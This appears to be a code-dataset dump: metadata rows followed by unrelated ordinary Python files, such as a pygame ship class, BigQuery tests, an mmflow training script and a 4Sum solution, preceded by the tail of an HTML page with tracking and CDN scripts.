n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s) }(window, document,'script','//connect.facebook.net/en_US/fbevents.js'); fbq('init', '1670563073163149'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1670563073163149&ev=PageView&noscript=1"/></noscript><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.0.1/jquery-migrate.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/js/bootstrap.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/moment.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/locale/ko.js"></script><script type="text/javascript" src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/app.min.js?version=20210107"></script><script type="text/javascript">jQuery(document).ready(function() {App.init(0);});</script><!--[if lt IE 9]><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/respond.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/html5shiv.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/plugins/placeholder-IE-fixes.js"></script><![endif]--><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.0.2/pace.min.js"></script><script src="https://js.pusher.com/4.2/pusher.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.js"></script> <script> window.MathJax = { tex: { inlineMath: [ ['$', '$'], ['\\(', '\\)'] ], displayMath: [ ['$$','$$'], ["\\[","\\]"] ], processEscapes: true, tags: "ams", autoload: { color: [], colorv2: ['color'] }, packages: { '[+]': ['noerrors'] } }, options: { ignoreHtmlClass: "no-mathjax|redactor-editor", processHtmlClass: 'mathjax', enableMenu: false }, chtml: { scale: 0.9 }, loader: { load: ['input/tex', 'output/chtml', '[tex]/noerrors'], } }; </script><script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script><script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script> </body> </html>
4d4d91dbf71adc295e441bc7d03a0ec941967878
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_8965.py
60985953452cc8e3a19e764e0aa2103646d7d4f7
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
141
py
# Use python to run shell script with Popen behaves differently in python command line and actual program from subprocess import Popen, PIPE
a5e60e51f46f0f4c1de4519f9e3ed6e437e72ee2
0862943574c7cbf98f7d049a516e8caf204304d1
/todo_list.py
3802e8c3b0c13da8abc8fac0eeef687f9a4748c8
[]
no_license
MsMunda/Fun
4a29a4d70e8f46e8d94c385831a7a49135566104
6d22207b75a59cb53d1d2e85549472571feeb1c5
refs/heads/master
2021-01-20T03:23:27.051210
2017-04-27T01:08:24
2017-04-27T01:08:24
89,535,789
0
0
null
null
null
null
UTF-8
Python
false
false
1,109
py
"""This is a Terminal-based program that allows a user to create and edit a to-do list. The stub of each function has been provided. Read the docstrings for what each function should do and complete the body of the functions below. You can run the script in your Terminal at any time using the command: >>> python todo_list.py """ def add_to_list(my_list): """Takes user input and adds it as a new item to the end of the list.""" print "The add_to_list function has not yet been written" def view_list(my_list): """Print each item in the list.""" print "The view_list function has not yet been written" def display_main_menu(my_list): """Displays main options, takes in user input, and calls view or add function.""" user_options = """ \nWould you like to: A. Add a new item B. View list C. Quit the program >>> """ while True: user_input = raw_input(user_options) if user_input == 'A': add_to_list(my_list) #------------------------------------------------- my_list = [] display_main_menu(my_list)
848cf25049faf52b0f930681494b0600a719b9da
4a3bf95187335a8d46139b1d7a67586e96eb387f
/venv/Scripts/easy_install-script.py
7527f9f055f57237c2921b4ee8431cf9d8aefd47
[]
no_license
ares5221/python-Learning
6f786b9edf081010cd6f2ad684f505d30da8d4a8
4ae77239e2b91bb84b306930af88b5035b897963
refs/heads/master
2021-06-04T03:00:17.338022
2020-04-13T08:14:06
2020-04-13T08:14:06
134,068,556
0
0
null
null
null
null
UTF-8
Python
false
false
454
py
#!G:\pythonLearningWorkSpace\python-Learning\venv\Scripts\python.exe # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install' __requires__ = 'setuptools==39.1.0' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')() )
a9c3e5697018a920d3e2f4f5430092dd2011706e
ec00584ab288267a7cf46c5cd4f76bbec1c70a6b
/offline/__Digital_Twin/__release2/__release2_sprint4/15619 - Link the asset locations to local weather/dev/dev.py
585898cda425bdfd488487cf9f2d129e386b1a2e
[]
no_license
rahuldbhadange/Python
b4cc806ff23953389c9507f43d817b3815260e19
7e162117f1acc12537c7eeb36d6983d804122ff3
refs/heads/master
2021-06-23T05:04:20.053777
2020-01-28T10:34:28
2020-01-28T10:34:28
217,307,612
0
0
null
2021-06-10T22:44:11
2019-10-24T13:35:42
Python
UTF-8
Python
false
false
2,116
py
# -*- coding: utf-8 -*- # Copyright (c) 2017 Iotic Labs Ltd. All rights reserved. from __future__ import unicode_literals, print_function from json import dumps import logging logging.basicConfig(format='%(asctime)s %(levelname)s [%(name)s] {%(threadName)s} %(message)s', level=logging.WARNING) logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) from IoticAgent.Core.compat import monotonic from IoticAgent.ThingRunner import RetryingThingRunner def pretty_print(msg, data): print(msg, dumps(data, indent=4)) class TemplateTR(RetryingThingRunner): LOOP_TIMER = 10 # minimum number of seconds duration of the main loop def __init__(self, config=None): """Instantiation code in here, after the call to super().__init__() """ super(TemplateTR, self).__init__(config=config) def on_startup(self): """Called once at the beginning, before main(). Use this method to create your things, rebind connections, setup hardware, etc. """ results = self.client.search(text="weather", location={'lat': 52.427809, 'long': -0.327829, 'radius': 10.789}, limit=1) pretty_print("results", results) for thing_guid, thing_data in results.items(): pretty_print("thing_guid", thing_guid) pretty_print("thing_data", thing_data) for point_guid, point_data in thing_data['points'].items(): pretty_print("point_guid", point_guid) pretty_print("point_data", point_data) descr = self.client.describe(point_guid) pretty_print("descr", descr) def main(self): """Called after on_startup. Use this method for your main loop (if you need one). Set LOOP_TIMER for your regular tick """ while True: start = monotonic() # loop code in here stop = monotonic() if self.wait_for_shutdown(max(0, self.LOOP_TIMER - (stop - start))): break def main(): TemplateTR(config="test.ini").run() if __name__ == '__main__': main()
9b42299d9d109563fa71c7a5fed85b1ebd999120
36907c0840b34687026b3439a06c49e5c0d2ef11
/tests/test_file.py
752908478767a7efc177298baf3fad6d612dd537
[ "BSD-2-Clause" ]
permissive
melscoop/pydeps
f5585adde69dfc2afd82254260a5dd4750cf57f2
c6078821222b314e2befbc6723a36967a9b5a47b
refs/heads/master
2023-08-29T00:19:55.845364
2021-10-14T06:07:02
2021-10-14T06:07:02
423,976,408
1
0
BSD-2-Clause
2021-11-02T19:51:10
2021-11-02T19:39:42
null
UTF-8
Python
false
false
713
py
# -*- coding: utf-8 -*- import os from tests.filemaker import create_files from tests.simpledeps import simpledeps def test_file(): files = """ a.py: | import collections """ with create_files(files) as workdir: assert simpledeps('a.py') == set() def test_file_pylib(): files = """ a.py: | import collections """ with create_files(files) as workdir: assert 'collections -> a' in simpledeps('a.py', '--pylib') def test_file_pyliball(): files = """ a.py: | import collections """ with create_files(files) as workdir: assert 'collections -> a' in simpledeps('a.py', '--pylib --pylib-all')
105b3a2100dc54523233be6553a7d540acbaf799
b8fb2620257b6286871211b7bde1cd8a0a5468db
/ts_feature_extractor.py
c86913b859b6d8d349b58a479f536fd14205f9ff
[]
no_license
mehdidc/elnino
f9aac0c586317d261151265cbd0290ae351731b8
7b85ad180634f1db4a61654d1475f54c60b694a4
refs/heads/master
2021-01-10T07:34:57.507222
2015-06-04T07:15:35
2015-06-04T07:15:35
36,854,530
0
0
null
null
null
null
UTF-8
Python
false
false
1,739
py
import numpy as np en_lat_bottom = -5 en_lat_top = 5 en_lon_left = 360-170 en_lon_right = 360-120 def get_enso_mean(tas): """The array of mean temperatures in the El Nino 3.4 region at all time points.""" return tas.loc[:, en_lat_bottom:en_lat_top, en_lon_left:en_lon_right].mean(dim=('lat','lon')) class FeatureExtractor(object): def __init__(self): pass def transform(self, temperatures_xray, n_burn_in, n_lookahead, skf_is): """Combine two variables: the montly means corresponding to the month of the target and the current mean temperature in the El Nino 3.4 region.""" # This is the range for which features should be provided. Strip # the burn-in from the beginning and the prediction look-ahead from # the end. valid_range = range(n_burn_in, temperatures_xray['time'].shape[0] - n_lookahead) enso = get_enso_mean(temperatures_xray['tas']) # reshape the vector into a table years as rows, months as columns enso_matrix = enso.values.reshape((-1,12)) count_matrix = np.ones(enso_matrix.shape) # compute cumulative means of columns (remember that you can only use # the past at each time point) and reshape it into a vector enso_monthly_mean = (enso_matrix.cumsum(axis=0) / count_matrix.cumsum(axis=0)).ravel() # roll it backwards (6 months) so it corresponds to the month of the target enso_monthly_mean_rolled = np.roll(enso_monthly_mean, n_lookahead - 12) # select valid range enso_monthly_mean_valid = enso_monthly_mean_rolled[valid_range] enso_valid = enso.values[valid_range] X = np.array([enso_valid, enso_monthly_mean_valid]).T return X
d5d85c91e7b3eb67b2067d90181727ba54def11a
3db7b5409f2f9c57ab3f98bda50f8b548d98063d
/tests/system/test_list_rows.py
4c08958c37ac71ea16fd4a02c8b4507fedecac2b
[ "Apache-2.0" ]
permissive
googleapis/python-bigquery
66db156b52e97565f6211b2fab5aac4e519fa798
3645e32aeebefe9d5a4bc71a6513942741f0f196
refs/heads/main
2023-09-01T07:41:24.893598
2023-08-23T19:04:13
2023-08-23T19:04:13
226,992,475
622
287
Apache-2.0
2023-09-12T04:31:26
2019-12-10T00:09:04
Python
UTF-8
Python
false
false
4,455
py
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import decimal from dateutil import relativedelta from google.cloud import bigquery from google.cloud.bigquery import enums def test_list_rows_empty_table(bigquery_client: bigquery.Client, table_id: str): from google.cloud.bigquery.table import RowIterator table = bigquery_client.create_table(table_id) # It's a bit silly to list rows for an empty table, but this does # happen as the result of a DDL query from an IPython magic command. rows = bigquery_client.list_rows(table) assert isinstance(rows, RowIterator) assert tuple(rows) == () def test_list_rows_page_size(bigquery_client: bigquery.Client, table_id: str): num_items = 7 page_size = 3 num_pages, num_last_page = divmod(num_items, page_size) to_insert = [{"string_col": "item%d" % i, "rowindex": i} for i in range(num_items)] bigquery_client.load_table_from_json(to_insert, table_id).result() df = bigquery_client.list_rows( table_id, selected_fields=[bigquery.SchemaField("string_col", enums.SqlTypeNames.STRING)], page_size=page_size, ) pages = df.pages for i in range(num_pages): page = next(pages) assert page.num_items == page_size page = next(pages) assert page.num_items == num_last_page def test_list_rows_scalars(bigquery_client: bigquery.Client, scalars_table: str): rows = sorted( bigquery_client.list_rows(scalars_table), key=lambda row: row["rowindex"] ) row = rows[0] assert row["bool_col"] # True assert row["bytes_col"] == b"Hello, World!" assert row["date_col"] == datetime.date(2021, 7, 21) assert row["datetime_col"] == datetime.datetime(2021, 7, 21, 11, 39, 45) assert row["geography_col"] == "POINT(-122.0838511 37.3860517)" assert row["int64_col"] == 123456789 assert row["interval_col"] == relativedelta.relativedelta( years=7, months=11, days=9, hours=4, minutes=15, seconds=37, microseconds=123456 ) assert row["numeric_col"] == decimal.Decimal("1.23456789") assert row["bignumeric_col"] == decimal.Decimal("10.111213141516171819") assert row["float64_col"] == 1.25 assert row["string_col"] == "Hello, World!" assert row["time_col"] == datetime.time(11, 41, 43, 76160) assert row["timestamp_col"] == datetime.datetime( 2021, 7, 21, 17, 43, 43, 945289, tzinfo=datetime.timezone.utc ) nullrow = rows[1] for column, value in nullrow.items(): if column == "rowindex": assert value == 1 else: assert value is None def test_list_rows_scalars_extreme( bigquery_client: bigquery.Client, scalars_extreme_table: str ): rows = sorted( bigquery_client.list_rows(scalars_extreme_table), key=lambda row: row["rowindex"], ) row = rows[0] assert row["bool_col"] # True assert row["bytes_col"] == b"\r\n" assert row["date_col"] == datetime.date(9999, 12, 31) assert row["datetime_col"] == datetime.datetime(9999, 12, 31, 23, 59, 59, 999999) assert row["geography_col"] == "POINT(-135 90)" assert row["int64_col"] == 9223372036854775807 assert row["interval_col"] == relativedelta.relativedelta( years=-10000, days=-3660000, hours=-87840000 ) assert row["numeric_col"] == decimal.Decimal(f"9.{'9' * 37}E+28") assert row["bignumeric_col"] == decimal.Decimal(f"9.{'9' * 75}E+37") assert row["float64_col"] == float("Inf") assert row["string_col"] == "Hello, World" assert row["time_col"] == datetime.time(23, 59, 59, 999999) assert row["timestamp_col"] == datetime.datetime( 9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc ) nullrow = rows[4] for column, value in nullrow.items(): if column == "rowindex": assert value == 4 else: assert value is None
61d4759ecc91732720a3b6343a276d796bea8fd6
6aa7e203f278b9d1fd01244e740d5c944cc7c3d3
/airflow/api_connexion/schemas/event_log_schema.py
0753a8a104a44ec8b1a0d3b8965e9cd0eee383b3
[ "Apache-2.0", "BSD-3-Clause", "MIT", "Python-2.0" ]
permissive
laserpedro/airflow
83fc991d91749550b151c81876d9e7864bff3946
a28afa8172489e41ecf7c381674a0cb91de850ff
refs/heads/master
2023-01-02T04:55:34.030935
2020-10-24T15:55:11
2020-10-24T15:55:11
285,867,990
1
0
Apache-2.0
2020-08-07T15:56:49
2020-08-07T15:56:49
null
UTF-8
Python
false
false
1,861
py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from typing import List, NamedTuple from marshmallow import Schema, fields from marshmallow_sqlalchemy import SQLAlchemySchema, auto_field from airflow.models.log import Log class EventLogSchema(SQLAlchemySchema): """ Event log schema """ class Meta: """ Meta """ model = Log id = auto_field(data_key='event_log_id', dump_only=True) dttm = auto_field(data_key='when', dump_only=True) dag_id = auto_field(dump_only=True) task_id = auto_field(dump_only=True) event = auto_field(dump_only=True) execution_date = auto_field(dump_only=True) owner = auto_field(dump_only=True) extra = auto_field(dump_only=True) class EventLogCollection(NamedTuple): """ List of import errors with metadata """ event_logs: List[Log] total_entries: int class EventLogCollectionSchema(Schema): """ EventLog Collection Schema """ event_logs = fields.List(fields.Nested(EventLogSchema)) total_entries = fields.Int() event_log_schema = EventLogSchema() event_log_collection_schema = EventLogCollectionSchema()
5c25a940343aea2972f36ee9b25e6e5a5019f0f5
9e567b8241ce00e9d53843f5aba11c4a119b079f
/tags/v0_61_0/htdocs/tut/silly_axes.py
acdd1abf85c5ec85aa02e9070be482fceec67f1b
[ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
neilpanchal/matplotlib
3d2a7133e858c4eefbb6c2939eb3f7a328b18118
7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83
refs/heads/master
2020-06-11T09:20:43.941323
2011-01-21T21:50:16
2011-01-21T21:50:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
240
py
from matplotlib.matlab import * t = arange(0, 2.1, 0.1) rc('grid', color=0.75, linewidth=1.5) rc('tick', color='b', labelsize=14) a = subplot(111) plot(t, t**2, '-') title('Custom axes using rc') grid(True) savefig('custom_axes') show()
[ "(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed" ]
(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed
e3c9eebf31eb84021294e0f466f8819622e71363
7b65481a7183f56a8b4ba2bce08cd1131cebe0e6
/infinitelooper.py
0365155016e44f11023400bc8ece254156932bd4
[]
no_license
guadalupeaceves-lpsr/class-samples
17e261084de2e64ceae6daaaac5a53618eeafb37
bc5c096453243ef76ca6854d54232ea234ba24b5
refs/heads/master
2021-01-21T04:48:01.443832
2016-06-13T03:50:15
2016-06-13T03:50:15
48,007,839
0
0
null
null
null
null
UTF-8
Python
false
false
153
py
print("What's your favorite number?") num = int(raw_input()) while num != 14: print("Nope, I don't like it. Choose another.") num = int(raw_input())
[ "lps@lps-1011PX.(none)" ]
lps@lps-1011PX.(none)
63366e5426c932f5970b06f1ed4796f94c709e38
3fd9c7ee49a32eae3013191b63154a9a5d6dafe6
/12.6驾驶飞船/12.6.3左右移动/ship_3.py
29b66748188b9598c3cd9ceb7bfaba5932bbc169
[]
no_license
taozhenting/alien_invasion
e0c03cd9797cb33e40ca47a13eadeda8b1c4cf85
fd9bd97d6238da702fbb1eb6fcb78e8352875fe2
refs/heads/master
2020-04-27T05:31:48.862784
2019-01-30T09:43:49
2019-01-30T09:43:50
174,083,029
0
0
null
null
null
null
UTF-8
Python
false
false
1,737
py
#增加左边移动 import pygame class Ship(): #screen参数指定了飞船绘制到什么地方 def __init__(self,screen): """初始化飞船并设置其初始位置""" self.screen = screen #加载飞船图像并获取其外接矩形 #调用pygame.image.load()这个函数返回一个表示飞船的surface并存储到了self.image self.image = pygame.image.load('images/ship.bmp') #rect处理对象是矩形,即便它们形状并非矩形。使用get_rect()获取相应surface的属性rect self.rect = self.image.get_rect() #将表示屏幕的矩形存储在self.screen_rect self.screen_rect = screen.get_rect() #将每艘新飞船放在屏幕中央 #将self.rect.centerx(飞船中心的x坐标)设置为表示屏幕的矩形的属性centerx self.rect.centerx = self.screen_rect.centerx #将self.rect.bottom(飞船下边缘的y坐标)设置为表示屏幕的矩形的属性bottom self.rect.bottom = self.screen_rect.bottom #移动标志,增加左移动 self.moving_right = False self.moving_left = False def update(self): """根据移动标志调整飞船的位置""" if self.moving_right: self.rect.centerx += 1 #添加了if而不是elif,因为如果同时按下左右箭头,先增加再减少self.rect.centerx #如果用elif,右箭头将始终处于优先地位 if self.moving_left: self.rect.centerx -= 1 #定义了方法blitme(),它根据self.rect指定的位置将图像绘制到屏幕上 def blitme(self): """在指定位置绘制飞船""" self.screen.blit(self.image,self.rect)
0640154e6d006f7e8cd5a8a84feb4397adea1e62
3dbb38734200935f143ea8b6446e9bf32a4a16ee
/PyClient/TableOfLife/app/forms.py
2f670b63694db308562266cdc27f51cebb639723
[]
no_license
k-t-l-h/TableOfLife
4624938a2edff3b5de336c30fec5775a5e3971cf
f0ceefe499b9a5a76b9f15201cbd409fa75f0605
refs/heads/main
2023-05-14T09:39:37.406622
2021-06-03T19:35:43
2021-06-03T19:35:43
345,408,827
0
2
null
2023-02-17T18:58:24
2021-03-07T17:26:42
C++
UTF-8
Python
false
false
1,125
py
from django.core.exceptions import ValidationError, ObjectDoesNotExist from django.contrib.auth.models import User from django.core import validators from django import forms import re class AskForm(forms.Form): classes = forms.CharField(label='О предметах:', widget=forms.Textarea( attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Название предмета, Имя преподавателя, Количество студентов'})) students = forms.CharField(label='Выбор учеников:', widget=forms.Textarea( attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Матрица оценок'})) settings = forms.CharField(label='Настройка (только для продвинутых): crossover, mutation, selector, creator', widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Указывайте через запятую'})) class PostForm(forms.Form): uuid = forms.CharField(label='Ваш UUID:', widget=forms.TextInput( attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'UUID'}))
4b019b306236babfdf442ed4b7f1e6d0ebb21614
ae8a89e90b4d69a061076563ba68272d27e5c664
/HIDS/main.py
a75779d5ec65158a8c28c296ca08fbb8d7b57269
[]
no_license
Louis-Saglio/python_script
8d1a65f704c21eb3b2fee17e63b8d2b467764bb0
f039e61078f5eb18d3334c4940d794fa5bc5f67d
refs/heads/master
2022-12-21T21:37:07.234976
2017-10-29T15:52:47
2017-10-29T15:52:47
106,963,199
0
1
null
2022-12-09T03:22:11
2017-10-14T21:11:03
Python
UTF-8
Python
false
false
255
py
import filecmp import os def rlistdir(path='.'): for directory, sub_dir, files in os.walk(path): for file in files: yield os.path.join(directory, file) if __name__ == '__main__': for i in rlistdir('/usr'): print(i)
bcfaee049701f0696da3a47ef641b699bbe4b7cd
c5f58af61e3577ded52acda210f4f664651b598c
/template/mmdetection/configs/foveabox/fovea_r50_fpn_4x4_1x_coco.py
2b00ad2faf61e2c437b5237d9de02049a81edf57
[ "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
hojihun5516/object-detection-level2-cv-02
0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac
bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109
refs/heads/master
2023-08-31T09:50:59.150971
2021-10-16T15:00:19
2021-10-16T15:00:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,528
py
_base_ = ["../_base_/datasets/coco_detection.py", "../_base_/schedules/schedule_1x.py", "../_base_/default_runtime.py"] # model settings model = dict( type="FOVEA", backbone=dict( type="ResNet", depth=50, num_stages=4, out_indices=(0, 1, 2, 3), frozen_stages=1, norm_cfg=dict(type="BN", requires_grad=True), norm_eval=True, style="pytorch", init_cfg=dict(type="Pretrained", checkpoint="torchvision://resnet50"), ), neck=dict( type="FPN", in_channels=[256, 512, 1024, 2048], out_channels=256, start_level=1, num_outs=5, add_extra_convs="on_input", ), bbox_head=dict( type="FoveaHead", num_classes=80, in_channels=256, stacked_convs=4, feat_channels=256, strides=[8, 16, 32, 64, 128], base_edge_list=[16, 32, 64, 128, 256], scale_ranges=((1, 64), (32, 128), (64, 256), (128, 512), (256, 2048)), sigma=0.4, with_deform=False, loss_cls=dict(type="FocalLoss", use_sigmoid=True, gamma=1.50, alpha=0.4, loss_weight=1.0), loss_bbox=dict(type="SmoothL1Loss", beta=0.11, loss_weight=1.0), ), # training and testing settings train_cfg=dict(), test_cfg=dict(nms_pre=1000, score_thr=0.05, nms=dict(type="nms", iou_threshold=0.5), max_per_img=100), ) data = dict(samples_per_gpu=4, workers_per_gpu=4) # optimizer optimizer = dict(type="SGD", lr=0.01, momentum=0.9, weight_decay=0.0001)
6357de8a8bbeccf5484ff2c1b1e34b8452d63ff4
8a12d939f01a179c1fb8b7e72d8cb1c7d4970b6f
/tools/train.py
ebc65480c5fc9610caee60b39c0eafdd4661cecf
[ "Apache-2.0" ]
permissive
459737087/mmflow
bebd2da1bd87e9b5b2a1a10ecdc61558978610d9
a32f7af12f1a0d2ae3f962f4c94a4a1680c7a19e
refs/heads/master
2023-09-03T03:04:40.010033
2021-11-18T04:35:06
2021-11-18T04:35:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,433
py
# Copyright (c) OpenMMLab. All rights reserved. import argparse import copy import os import os.path as osp import time import mmcv import torch from mmcv import Config, DictAction from mmcv.runner import init_dist from mmcv.utils import get_git_hash from mmflow import __version__ from mmflow.apis import set_random_seed, train_model from mmflow.datasets import build_dataset from mmflow.models import build_flow_estimator from mmflow.utils import collect_env, get_root_logger def parse_args(): parser = argparse.ArgumentParser(description='Train a flow estimator') parser.add_argument('config', help='train config file path') parser.add_argument('--work-dir', help='the dir to save logs and models') parser.add_argument( '--load-from', help='the checkpoint file to load weights from') parser.add_argument( '--resume-from', help='the checkpoint file to resume from') parser.add_argument( '--no-validate', action='store_true', help='whether not to evaluate the checkpoint during training') group_gpus = parser.add_mutually_exclusive_group() group_gpus.add_argument( '--gpus', type=int, help='number of gpus to use ' '(only applicable to non-distributed training)') group_gpus.add_argument( '--gpu-ids', type=int, nargs='+', help='ids of gpus to use ' '(only applicable to non-distributed training)') parser.add_argument('--seed', type=int, default=None, help='random seed') parser.add_argument( '--deterministic', action='store_true', help='whether to set deterministic options for CUDNN backend.') parser.add_argument( '--cfg-options', nargs='+', action=DictAction, help='override some settings in the used config, the key-value pair ' 'in xxx=yyy format will be merged into config file. If the value to ' 'be overwritten is a list, it should be like key="[a,b]" or key=a,b ' 'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" ' 'Note that the quotation marks are necessary and that no white space ' 'is allowed.') parser.add_argument( '--launcher', choices=['none', 'pytorch', 'slurm', 'mpi'], default='none', help='job launcher') parser.add_argument('--local_rank', type=int, default=0) args = parser.parse_args() if 'LOCAL_RANK' not in os.environ: os.environ['LOCAL_RANK'] = str(args.local_rank) return args def main(): args = parse_args() cfg = Config.fromfile(args.config) if args.cfg_options is not None: cfg.merge_from_dict(args.cfg_options) # set cudnn_benchmark if cfg.get('cudnn_benchmark', False): torch.backends.cudnn.benchmark = True # work_dir is determined in this priority: CLI > config > default filename if args.work_dir is not None: # update configs according to CLI args if args.work_dir is not None cfg.work_dir = args.work_dir elif cfg.get('work_dir', None) is None: # use config filename as default work_dir if cfg.work_dir is None cfg.work_dir = osp.join('./work_dirs', osp.splitext(osp.basename(args.config))[0]) if args.load_from is not None: cfg.load_from = args.load_from if args.resume_from is not None: cfg.resume_from = args.resume_from if args.gpu_ids is not None: cfg.gpu_ids = args.gpu_ids else: cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus) # init distributed env first, since logger depends on the dist info. if args.launcher == 'none': distributed = False else: distributed = True init_dist(args.launcher, **cfg.dist_params) # create work_dir mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir)) # dump config cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config))) # init the logger before other steps timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime()) log_file = osp.join(cfg.work_dir, f'{timestamp}.log') logger = get_root_logger(log_file=log_file, log_level=cfg.log_level) # init the meta dict to record some important information such as # environment info and seed, which will be logged meta = dict() # log env info env_info_dict = collect_env() env_info = '\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()]) dash_line = '-' * 60 + '\n' logger.info('Environment info:\n' + dash_line + env_info + '\n' + dash_line) meta['env_info'] = env_info # log some basic info logger.info(f'Distributed training: {distributed}') logger.info(f'Config:\n{cfg.pretty_text}') # set random seeds if args.seed is not None: logger.info(f'Set random seed to {args.seed}, deterministic: ' f'{args.deterministic}') set_random_seed(args.seed, deterministic=args.deterministic) cfg.seed = args.seed meta['seed'] = args.seed meta['exp_name'] = osp.basename(args.config) model = build_flow_estimator(cfg.model) model.init_weights() logger.info(model) if cfg.data.train_dataloader.get('sample_ratio') is None: # build_dataset will concat the list of dataset # so there is one dataset in the list datasets = [build_dataset(cfg.data.train)] else: # the list of datasets is for Mixbatch datasets = [[build_dataset(c) for c in cfg.data.train]] if len(cfg.workflow) == 2: val_dataset = copy.deepcopy(cfg.data.val) val_dataset.pipeline = cfg.data.train.pipeline datasets.append(build_dataset(val_dataset)) if cfg.checkpoint_config is not None: # save mmflow version, config file content and class names in # checkpoints as meta data cfg.checkpoint_config.meta = dict( mmflow_version=f'{__version__}+{get_git_hash()[:7]}', config=cfg.pretty_text) # add an attribute for visualization convenience datasets_size = 0 for ds in datasets: datasets_size += len(ds) logger.info(f'dataset size {datasets_size}') train_model( model, datasets, cfg, distributed=distributed, validate=(not args.no_validate), timestamp=timestamp, meta=meta) if __name__ == '__main__': main()
73575c45ed55b4146558350ddb50d28b66091187
8ef5a09d76a11c56963f18e6a08474a1a8bafe3c
/leet_code/18. 4Sum.py
972245f09f2573fa6cc14283b372bbd0b6f022b4
[]
no_license
roiei/algo
32c4677649c7666db148f6183fbfbf66c8b1969f
ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec
refs/heads/master
2022-04-01T19:21:27.768675
2022-02-19T06:15:29
2022-02-19T06:15:29
169,021,154
0
0
null
null
null
null
UTF-8
Python
false
false
1,124
py
import time from util.util_list import * from util.util_tree import * import copy import collections import bisect class Solution: def fourSum(self, nums: [int], target: int) -> [[int]]: n = len(nums) res = set() nums.sort() for i in range(n - 2): for j in range(i + 1, n - 2): l = j + 1 r = n - 1 acc = nums[i] + nums[j] diff = target - acc while l < r: sum = nums[l] + nums[r] if sum == diff: res.add((nums[i], nums[j], nums[l], nums[r],)) l += 1 r -= 1 continue if sum > diff: r -= 1 elif sum < diff: l += 1 return res stime = time.time() print([ [-1, 0, 0, 1], [-2, -1, 1, 2], [-2, 0, 0, 2] ] == Solution().fourSum([1, 0, -1, 0, -2, 2], 0)) print('elapse time: {} sec'.format(time.time() - stime))
d009fd95134a3669c4c74320b9db66ee498878d4
81e706b69c789aff05691c41fa79156942927f82
/site-packages/tensorflow/python/keras/callbacks.py
5d086dc28d5ff15b78374ab770676dcc6059d4b8
[]
no_license
yoncho/OpenCV-code
f5a1091ef32f3c8c3254ab93e083950b84c4fabd
bda2f793b11462e67c7ab644b342beffb871e3de
refs/heads/master
2023-03-30T12:01:23.521511
2021-04-01T13:45:44
2021-04-01T13:45:44
291,398,453
0
0
null
null
null
null
UTF-8
Python
false
false
76,839
py
